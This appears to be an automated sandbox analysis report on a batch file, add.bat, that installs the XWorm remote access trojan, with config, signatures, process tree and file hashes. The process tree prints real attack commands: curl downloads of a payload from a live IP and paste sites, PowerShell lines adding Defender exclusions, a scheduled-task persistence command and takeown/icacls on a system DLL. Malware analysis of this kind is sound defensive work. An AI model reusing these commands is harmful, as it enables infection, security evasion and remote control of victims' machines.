Overview

overview

10

Static

static

1

add.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    85s
  • max time network
    92s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-10-2024 09:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    add.bat

  • Size

    2KB

  • MD5

    ddae753de5a27f0a02e0da8610e1b8d5

  • SHA1

    fac2504ef6dfba664468bbed911e9e517c322b6d

  • SHA256

    f7e2458457263888bf48e46d57f0e7ed4d451f305229b902052989de583bda65

  • SHA512

    fdaa43e1ed8ab64605cb35cb4d792f8a56029aaf2d322f38c9297103add573fe84020fe51a91796c47fa3d4b1e108e4735ad4e2491a8a4321a7adc21b48f806d

Score
10/10
xwormdiscoveryexecutionexploitrattrojan

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    winlogon.exe

  • pastebin_url

    https://pastebin.com/raw/QUwdrCNg

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
    ransomware
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\add.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4360
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4004
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:2400
      • C:\Windows\system32\timeout.exe
        timeout /t 6
        2⤵
        • Delays execution with timeout.exe
        PID:2776
      • C:\Windows\system32\curl.exe
        curl -s -o upx.bat https://rentry.co/qaa35e85/raw
        2⤵
          PID:3936
        • C:\Windows\system32\curl.exe
          curl -s -o dll.exe "http://176.96.137.126:3000/download/winlogon.exe"
          2⤵
            PID:2144
          • C:\Windows\system32\mshta.exe
            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ALERTA! Dati vouch pe discord ca va merge codu daca nu dati vouch -10000 aura', 10, 'ALERTA', 64);close();"
            2⤵
              PID:4900
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/fncheeto
              2⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:3408
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffcd1246f8,0x7fffcd124708,0x7fffcd124718
                3⤵
                  PID:2684
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
                  3⤵
                    PID:3288
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
                    3⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4244
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
                    3⤵
                      PID:4976
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                      3⤵
                        PID:3612
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                        3⤵
                          PID:3020
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:1
                          3⤵
                            PID:4608
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3712 /prefetch:8
                            3⤵
                              PID:4984
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3736 /prefetch:8
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3020
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:8
                              3⤵
                                PID:1116
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:8
                                3⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3024
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
                                3⤵
                                  PID:3640
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
                                  3⤵
                                    PID:4996
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
                                    3⤵
                                      PID:5216
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,16267689518841897216,2970685421786873508,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
                                      3⤵
                                        PID:5224
                                    • C:\Users\Admin\AppData\Local\Temp\dll.exe
                                      dll.exe
                                      2⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Suspicious behavior: AddClipboardFormatListener
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1816
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dll.exe'
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3024
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dll.exe'
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2312
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4332
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:744
                                      • C:\Windows\System32\schtasks.exe
                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"
                                        3⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2200
                                    • C:\Windows\system32\takeown.exe
                                      takeown /F C:\Windows\System32\CompPkgSup.dll
                                      2⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3584
                                    • C:\Windows\system32\icacls.exe
                                      icacls C:\Windows\System32\CompPkgSup.dll /grant Administrators:F
                                      2⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:1372
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:1292
                                    • C:\Windows\System32\NOTEPAD.EXE
                                      "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\add.bat
                                      1⤵
                                      • Opens file in notepad (likely ransom note)
                                      PID:1292
                                    • C:\Windows\System32\NOTEPAD.EXE
                                      "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\upx.bat
                                      1⤵
                                      • Opens file in notepad (likely ransom note)
                                      PID:5968

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      f426165d1e5f7df1b7a3758c306cd4ae

                                      SHA1

                                      59ef728fbbb5c4197600f61daec48556fec651c1

                                      SHA256

                                      b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

                                      SHA512

                                      8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      6960857d16aadfa79d36df8ebbf0e423

                                      SHA1

                                      e1db43bd478274366621a8c6497e270d46c6ed4f

                                      SHA256

                                      f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

                                      SHA512

                                      6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                      Filesize

                                      480B

                                      MD5

                                      658edc06ec94b874d23ac85abff63a55

                                      SHA1

                                      e9aa7894d0125afcacc110b43a87c6a73ea0fb49

                                      SHA256

                                      6e009f3c1916faeeaf409d3f6e1c596abfd150667fb5a252455dcbd850314ca8

                                      SHA512

                                      b99a39b9968ccf71a0540fe6de5ce669eb39425974417e8c57b5d4f334dd91f32a22c33cb1450de0c1b1a0b03df46da9885110755bc298483316d783661fec78

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      5KB

                                      MD5

                                      9ca00c7a3f779c5d2b4e050f25caf701

                                      SHA1

                                      88fb90821658788647fe5a11ba25da47acc987b3

                                      SHA256

                                      f84c02af97f0967481ad8e9b2d04305335e9b7a032e72cdb254ec1919a7745d6

                                      SHA512

                                      f568fc0ba6aa27a5b5c6ec95af64e4dfe7c9ce44c6cc363a0f8878a1d98c06bd5d08e131ebe0430d1a59dffe308fdd03b3bc0f72e6547d1e8f2077babd4f88da

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      aa9b554397ecb8f98e7e0c725c6bcc2b

                                      SHA1

                                      8f74d3cdeb13ddec82bc1d1f7e31eec10e074322

                                      SHA256

                                      2158070ef8892a62e7f8f904c82ddc85c9ebf40e8f24aba61e04093ffea5309e

                                      SHA512

                                      87aebdceaed3f45ffaa4dba562aa8464b0ae05197a9c3656070163fb88024d2aa348ec94b3d0c86bd4aa8e382f7c3b9a2ff01eed4b520cbffa0e8616730e6a7a

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                      Filesize

                                      16B

                                      MD5

                                      6752a1d65b201c13b62ea44016eb221f

                                      SHA1

                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                      SHA256

                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                      SHA512

                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      10KB

                                      MD5

                                      5b2c2068eb3fe9d87aae291ebb47a65a

                                      SHA1

                                      e9ff018fdc493aebe373ae574528789560314d06

                                      SHA256

                                      0b93cfd2273e11c3a7c23b6d157ab727579a6dbb77339d306da56bb1309cfae7

                                      SHA512

                                      9636bcf2f645f8ffa6e85df8c84e315e11ed78ab4c4ce536e5ddb85d2bc427634f4bcf570a4b3a730511ec158a9d3ee28e2dc2843045851daab14488689fbd13

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      3b444d3f0ddea49d84cc7b3972abe0e6

                                      SHA1

                                      0a896b3808e68d5d72c2655621f43b0b2c65ae02

                                      SHA256

                                      ab075b491d20c6f66c7bd40b57538c1cfdaab5aac4715bfe3bbc7f4745860a74

                                      SHA512

                                      eb0ab5d68472ec42de4c9b6d84306d7bca3874be1d0ac572030a070f21a698432418068e1a6006ff88480be8c8f54c769dee74b2def403f734109dba7261f36b

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      0517d7daa86e87ab93c37adcb931f498

                                      SHA1

                                      6b243308a84f033c4943c7f63c0f824d8db31a13

                                      SHA256

                                      3a962e5df85eedfa6b55bc984b49cf87f3ee67b81b849121f05defb6cafcad28

                                      SHA512

                                      a573701c9048be1cc7562d76ad5c5ec3be0928d476bcd2deb18e7585391d5d239dea81b528279f2d97c9dff6c08e1c10251b8e7ac162e6b57e602d2d9818593b

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      6d3e9c29fe44e90aae6ed30ccf799ca8

                                      SHA1

                                      c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                      SHA256

                                      2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                      SHA512

                                      60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lm2mh1wp.0mj.ps1
                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\dll.exe
                                      Filesize

                                      59KB

                                      MD5

                                      f2a18b995a82e938ab6a067491aa0d79

                                      SHA1

                                      d437fca2f38d712bafae8c92169eec8934699e54

                                      SHA256

                                      8efa6f0711c60afd3e6cb29df2b740ee4d01b7f4290a223aa85c6f54fb3b9da5

                                      SHA512

                                      73db4ec0271045f3f2c40fa197cf6300d81f32e4ecdddf792b475c8234d997c8d9ddfd62f944f230d8929017dfd1f473fbf4470f3bf6c2e92a8606cd3fed6d56

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\upx.bat
                                      Filesize

                                      310B

                                      MD5

                                      7a4ccdfc8b78bcb4e46602212a67b156

                                      SHA1

                                      13e5b0533829f7205aca1de7a8fd0b01bdac67b6

                                      SHA256

                                      fc3968d9e67b3625860c698aa83ffe00d476e13cf8584e9abf607d57c7315e54

                                      SHA512

                                      0dc9e2f9d6cefdcc225d124ed41eae4b72804193b5970ca5e320e09bea5fb0f351ef22b99b347093c115d6cf5d68923a38899985584dd4429b10f6a2f612aeac

                                      Download Submit

                                    • \??\pipe\LOCAL\crashpad_3408_IGZDKWXXBQKJKBSN
                                      MD5

                                      d41d8cd98f00b204e9800998ecf8427e

                                      SHA1

                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                      SHA256

                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                      SHA512

                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                      Download Submit

                                    • memory/1816-7-0x0000000000060000-0x0000000000074000-memory.dmp

                                      Filesize

                                      80KB

                                      Download

                                    • memory/3024-38-0x0000014A7CF30000-0x0000014A7CF52000-memory.dmp

                                      Filesize

                                      136KB

                                      Download